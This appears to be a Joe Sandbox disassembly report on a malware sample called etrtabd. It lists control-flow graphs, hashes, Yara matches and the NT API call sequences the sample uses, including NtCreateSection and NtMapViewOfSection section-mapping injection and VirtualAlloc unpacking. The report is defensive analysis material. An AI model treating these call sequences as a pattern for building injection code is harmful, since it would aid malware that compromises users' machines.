                                                              control_flow_graph 139 401524-401556 146 401563-40156c call 4012a9 139->146 151 401593-40159b 146->151 152 40156e-401580 146->152 155 40159d-4015a0 151->155 153 401582-401589 152->153 154 4015fd-401612 152->154 156 401560 153->156 157 40158b-40158d 153->157 158 4015a2-4015a4 155->158 159 4015e9-4015ef 155->159 156->146 162 401590-401592 157->162 160 4015a6-4015c7 158->160 161 4015f7 158->161 159->161 163 401643-401670 call 4012a9 160->163 164 4015c9 160->164 161->154 162->151 174 401672 163->174 175 401675-40167a 163->175 164->162 165 4015cb 164->165 165->155 167 4015cd 165->167 167->159 174->175 177 401680-401691 175->177 178 401991-401999 175->178 182 401697-4016c0 177->182 183 40198f 177->183 178->175 181 40199e-4019e0 call 4012a9 178->181 182->183 191 4016c6-4016dd NtDuplicateObject 182->191 183->181 191->183 193 4016e3-401707 NtCreateSection 191->193 195 401763-401789 NtCreateSection 193->195 196 401709-40172a NtMapViewOfSection 193->196 195->183 197 40178f-401793 195->197 196->195 199 40172c-401748 NtMapViewOfSection 196->199 197->183 200 401799-4017ba NtMapViewOfSection 197->200 199->195 202 40174a-401760 199->202 200->183 203 4017c0-4017dc NtMapViewOfSection 200->203 202->195 203->183 206 4017e2 call 4017e7 203->206
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                              • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                              • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                              • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65
                                                              Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 209 401615-401632 213 401643 209->213 214 401639-401670 call 4012a9 209->214 213->214 221 401672 214->221 222 401675-40167a 214->222 221->222 224 401680-401691 222->224 225 401991-401999 222->225 229 401697-4016c0 224->229 230 40198f 224->230 225->222 228 40199e-4019e0 call 4012a9 225->228 229->230 238 4016c6-4016dd NtDuplicateObject 229->238 230->228 238->230 240 4016e3-401707 NtCreateSection 238->240 242 401763-401789 NtCreateSection 240->242 243 401709-40172a NtMapViewOfSection 240->243 242->230 244 40178f-401793 242->244 243->242 246 40172c-401748 NtMapViewOfSection 243->246 244->230 247 401799-4017ba NtMapViewOfSection 244->247 246->242 249 40174a-401760 246->249 247->230 250 4017c0-4017dc NtMapViewOfSection 247->250 249->242 250->230 253 4017e2 call 4017e7 250->253
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                              • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                              • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                              • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65
                                                              Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 256 401635-401670 call 4012a9 264 401672 256->264 265 401675-40167a 256->265 264->265 267 401680-401691 265->267 268 401991-401999 265->268 272 401697-4016c0 267->272 273 40198f 267->273 268->265 271 40199e-4019e0 call 4012a9 268->271 272->273 281 4016c6-4016dd NtDuplicateObject 272->281 273->271 281->273 283 4016e3-401707 NtCreateSection 281->283 285 401763-401789 NtCreateSection 283->285 286 401709-40172a NtMapViewOfSection 283->286 285->273 287 40178f-401793 285->287 286->285 289 40172c-401748 NtMapViewOfSection 286->289 287->273 290 401799-4017ba NtMapViewOfSection 287->290 289->285 292 40174a-401760 289->292 290->273 293 4017c0-4017dc NtMapViewOfSection 290->293 292->285 293->273 296 4017e2 call 4017e7 293->296
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectView
                                                              • String ID:
                                                              • API String ID: 1652636561-0
                                                              • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                              • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                              • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                              • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24
                                                              Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 299 40162d-401632 301 401643 299->301 302 401639-401670 call 4012a9 299->302 301->302 309 401672 302->309 310 401675-40167a 302->310 309->310 312 401680-401691 310->312 313 401991-401999 310->313 317 401697-4016c0 312->317 318 40198f 312->318 313->310 316 40199e-4019e0 call 4012a9 313->316 317->318 326 4016c6-4016dd NtDuplicateObject 317->326 318->316 326->318 328 4016e3-401707 NtCreateSection 326->328 330 401763-401789 NtCreateSection 328->330 331 401709-40172a NtMapViewOfSection 328->331 330->318 332 40178f-401793 330->332 331->330 334 40172c-401748 NtMapViewOfSection 331->334 332->318 335 401799-4017ba NtMapViewOfSection 332->335 334->330 337 40174a-401760 334->337 335->318 338 4017c0-4017dc NtMapViewOfSection 335->338 337->330 338->318 341 4017e2 call 4017e7 338->341
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                              • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                              • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                              • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24
                                                              Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 344 401620-401632 347 401643 344->347 348 401639-401670 call 4012a9 344->348 347->348 355 401672 348->355 356 401675-40167a 348->356 355->356 358 401680-401691 356->358 359 401991-401999 356->359 363 401697-4016c0 358->363 364 40198f 358->364 359->356 362 40199e-4019e0 call 4012a9 359->362 363->364 372 4016c6-4016dd NtDuplicateObject 363->372 364->362 372->364 374 4016e3-401707 NtCreateSection 372->374 376 401763-401789 NtCreateSection 374->376 377 401709-40172a NtMapViewOfSection 374->377 376->364 378 40178f-401793 376->378 377->376 380 40172c-401748 NtMapViewOfSection 377->380 378->364 381 401799-4017ba NtMapViewOfSection 378->381 380->376 383 40174a-401760 380->383 381->364 384 4017c0-4017dc NtMapViewOfSection 381->384 383->376 384->364 387 4017e2 call 4017e7 384->387
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                              • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                              • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                              • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24
                                                              Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 390 401658-401670 call 4012a9 394 401672 390->394 395 401675-40167a 390->395 394->395 397 401680-401691 395->397 398 401991-401999 395->398 402 401697-4016c0 397->402 403 40198f 397->403 398->395 401 40199e-4019e0 call 4012a9 398->401 402->403 411 4016c6-4016dd NtDuplicateObject 402->411 403->401 411->403 413 4016e3-401707 NtCreateSection 411->413 415 401763-401789 NtCreateSection 413->415 416 401709-40172a NtMapViewOfSection 413->416 415->403 417 40178f-401793 415->417 416->415 419 40172c-401748 NtMapViewOfSection 416->419 417->403 420 401799-4017ba NtMapViewOfSection 417->420 419->415 422 40174a-401760 419->422 420->403 423 4017c0-4017dc NtMapViewOfSection 420->423 422->415 423->403 426 4017e2 call 4017e7 423->426
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                              • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                              • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                              • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24
                                                              Function 0040BD58 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 216memorytimelibraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000000), ref: 0040BDCF
                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 0040BDF4
                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 0040BE01
                                                              • InitAtomTable.KERNEL32(00000000), ref: 0040BE08
                                                              • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0040BE49
                                                              • ReadFileScatter.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0040BE6C
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040BE7B
                                                              • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BE85
                                                              • RtlInterlockedPopEntrySList.NTDLL(?), ref: 0040BE9E
                                                              • FileTimeToSystemTime.KERNEL32(00000000,00000000), ref: 0040BEDB
                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BEE5
                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0040BEED
                                                              • GetFileAttributesW.KERNEL32(00423138), ref: 0040BEF8
                                                              • CompareStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040BF0A
                                                              • ActivateActCtx.KERNEL32(00000000,00000000), ref: 0040BF12
                                                                • Part of subcall function 0040BA54: GetModuleHandleW.KERNEL32(0042310C,0040BF7A), ref: 0040BA59
                                                                • Part of subcall function 0040BA54: GetProcAddress.KERNEL32(00000000,00423128), ref: 0040BA65
                                                              • LoadLibraryA.KERNELBASE(004231E4), ref: 0040BFCC
                                                              • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0040C028
                                                              • GetProcessHeaps.KERNEL32(00000000,00000000), ref: 0040C046
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: File$Time$ConsoleInterlockedModule$ActivateAddressAllocAtomAttributesCalendarCompareCriticalDeleteEntryEnumExceptionExchangeFormatsHandleHeapsInfoInitLibraryListLoadLocalModeNameOutputProcProcessRaiseReadScatterSectionStringSystemTableWrite
                                                              • String ID: k`$tl_$}$
                                                              • API String ID: 2790545399-211918992
                                                              • Opcode ID: 62ebdbc1345a9830f6c3b71613122af7ca7e2f41f5a114459fff0b3f35dfb333
                                                              • Instruction ID: 983014b9c3dec96d1e327b941389972c90706ee8dc4b42e0b9954b56a4e297c8
                                                              • Opcode Fuzzy Hash: 62ebdbc1345a9830f6c3b71613122af7ca7e2f41f5a114459fff0b3f35dfb333
                                                              • Instruction Fuzzy Hash: 817172B5900218AED720AFB5DD84D6B76BCFB08348F00547AF549F2166DB388D45CFA8
                                                              Function 020C003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 54 20c003c-20c0047 55 20c004c-20c0263 call 20c0a3f call 20c0e0f call 20c0d90 VirtualAlloc 54->55 56 20c0049 54->56 71 20c028b-20c0292 55->71 72 20c0265-20c0289 call 20c0a69 55->72 56->55 74 20c02a1-20c02b0 71->74 76 20c02ce-20c03c2 VirtualProtect call 20c0cce call 20c0ce7 72->76 74->76 77 20c02b2-20c02cc 74->77 83 20c03d1-20c03e0 76->83 77->74 84 20c0439-20c04b8 VirtualFree 83->84 85 20c03e2-20c0437 call 20c0ce7 83->85 86 20c04be-20c04cd 84->86 87 20c05f4-20c05fe 84->87 85->83 89 20c04d3-20c04dd 86->89 90 20c077f-20c0789 87->90 91 20c0604-20c060d 87->91 89->87 94 20c04e3-20c0505 89->94 95 20c078b-20c07a3 90->95 96 20c07a6-20c07b0 90->96 91->90 97 20c0613-20c0637 91->97 105 20c0517-20c0520 94->105 106 20c0507-20c0515 94->106 95->96 98 20c086e-20c08be LoadLibraryA 96->98 99 20c07b6-20c07cb 96->99 100 20c063e-20c0648 97->100 104 20c08c7-20c08f9 98->104 102 20c07d2-20c07d5 99->102 100->90 103 20c064e-20c065a 100->103 107 20c0824-20c0833 102->107 108 20c07d7-20c07e0 102->108 103->90 109 20c0660-20c066a 103->109 110 20c08fb-20c0901 104->110 111 20c0902-20c091d 104->111 112 20c0526-20c0547 105->112 106->112 116 20c0839-20c083c 107->116 113 20c07e4-20c0822 108->113 114 20c07e2 108->114 115 20c067a-20c0689 109->115 110->111 117 20c054d-20c0550 112->117 113->102 114->107 118 20c068f-20c06b2 115->118 119 20c0750-20c077a 115->119 116->98 120 20c083e-20c0847 116->120 122 20c0556-20c056b 117->122 123 20c05e0-20c05ef 117->123 124 20c06ef-20c06fc 118->124 125 20c06b4-20c06ed 118->125 119->100 126 20c0849 120->126 127 20c084b-20c086c 120->127 130 20c056d 122->130 131 20c056f-20c057a 122->131 123->89 128 20c06fe-20c0748 124->128 129 20c074b 124->129 125->124 126->98 127->116 128->129 129->115 130->123 134 20c057c-20c0599 131->134 135 20c059b-20c05bb 131->135 138 20c05bd-20c05db 134->138 135->138 138->117
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020C024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_20c0000_etrtabd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: ecfa45407c1ea350709b3c759710d7c28efeb2aac6f67d85a0d3afcc632c755b
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 06526AB5A01229DFDB64CF58C984BACBBB1BF09304F1480E9E54DAB351DB30AA95DF14
                                                              Function 022066EA Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 429 22066ea-2206703 430 2206705-2206707 429->430 431 2206709 430->431 432 220670e-220671a CreateToolhelp32Snapshot 430->432 431->432 433 220672a-2206737 Module32First 432->433 434 220671c-2206722 432->434 435 2206740-2206748 433->435 436 2206739-220673a call 22063a9 433->436 434->433 441 2206724-2206728 434->441 439 220673f 436->439 439->435 441->430 441->433
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02206712
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02206732
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2203000_etrtabd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: 6c8f495e88117a7b8f565ec6d69e30f05fd2b20cde1c3cfba946b1f440fc2178
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 6CF0F631510316AFE7203FF5A8CCBBE76ECEF48628F100528E642D10D1DB70F8154A60
                                                              Function 0040C05D Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 442 40c05d-40c070 call 40bd58 444 40c075-40c079 442->444 445 40c082-40c089 444->445 446 40c0a6 445->446 447 40c08b-40c0a4 SetLastError GetConsoleAliasesA 445->447 446->446 447->445
                                                              APIs
                                                                • Part of subcall function 0040BD58: LocalReAlloc.KERNEL32(00000000,00000000,00000000), ref: 0040BDCF
                                                                • Part of subcall function 0040BD58: InterlockedExchange.KERNEL32(?,00000000), ref: 0040BDF4
                                                                • Part of subcall function 0040BD58: RtlDeleteCriticalSection.NTDLL(?), ref: 0040BE01
                                                                • Part of subcall function 0040BD58: InitAtomTable.KERNEL32(00000000), ref: 0040BE08
                                                                • Part of subcall function 0040BD58: WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0040BE49
                                                                • Part of subcall function 0040BD58: ReadFileScatter.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0040BE6C
                                                                • Part of subcall function 0040BD58: GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040BE7B
                                                                • Part of subcall function 0040BD58: RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BE85
                                                                • Part of subcall function 0040BD58: RtlInterlockedPopEntrySList.NTDLL(?), ref: 0040BE9E
                                                              • SetLastError.KERNEL32(00000000), ref: 0040C08D
                                                              • GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 0040C09E
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: ConsoleFileInterlocked$AliasesAllocAtomCriticalDeleteEntryErrorExceptionExchangeInitLastListLocalModuleNameOutputRaiseReadScatterSectionTableWrite
                                                              • String ID:
                                                              • API String ID: 3667857532-0
                                                              • Opcode ID: 813279e8e1a916ba94d193bc13b76e1b1b23179be4f78b8007e5de97a599e5e9
                                                              • Instruction ID: 551ccde0dd0d48cf6378eaa7998fdb273407ad05de26a9eb5aeb0103264d0f07
                                                              • Opcode Fuzzy Hash: 813279e8e1a916ba94d193bc13b76e1b1b23179be4f78b8007e5de97a599e5e9
                                                              • Instruction Fuzzy Hash: 53F03970D00208EBDB10EFE4C989B5EB7B4BB04709F5041BAE245B7080D7785B09DB4E
                                                              Function 020C0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 449 20c0e0f-20c0e24 SetErrorMode * 2 450 20c0e2b-20c0e2c 449->450 451 20c0e26 449->451 451->450
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,020C0223,?,?), ref: 020C0E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,020C0223,?,?), ref: 020C0E1E
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_20c0000_etrtabd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: acbd7547e9cf5466abce9091955199b2a3856100a0c2a904669a65f5e8444b90
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: 50D01271145228B7D7413B94DC09BCD7B5CDF05B66F108011FB0DD9080C770954046E5
                                                              Function 0040BA8B Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 452 40ba8b-40baa8 VirtualProtect
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(00000040,?), ref: 0040BAA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 9579d4fa8f1d047216bb4bfead913b7c675069936074915a355b04aa12b1eb40
                                                              • Instruction ID: 6e287615d579c877e3115f6ed5ab9f71deb573325f5e4f3e3404165ff566ea09
                                                              • Opcode Fuzzy Hash: 9579d4fa8f1d047216bb4bfead913b7c675069936074915a355b04aa12b1eb40
                                                              • Instruction Fuzzy Hash: 9CC08C7B20410CFBDB21CB91FE05E5A3B6CF304344F000060F319A0075C672A9099B18
                                                              Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 453 401a01-401a48 call 4012a9 Sleep call 401524 463 401a57-401aa7 call 4012a9 453->463 464 401a4a-401a52 call 401615 453->464 464->463
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                              • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                              • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
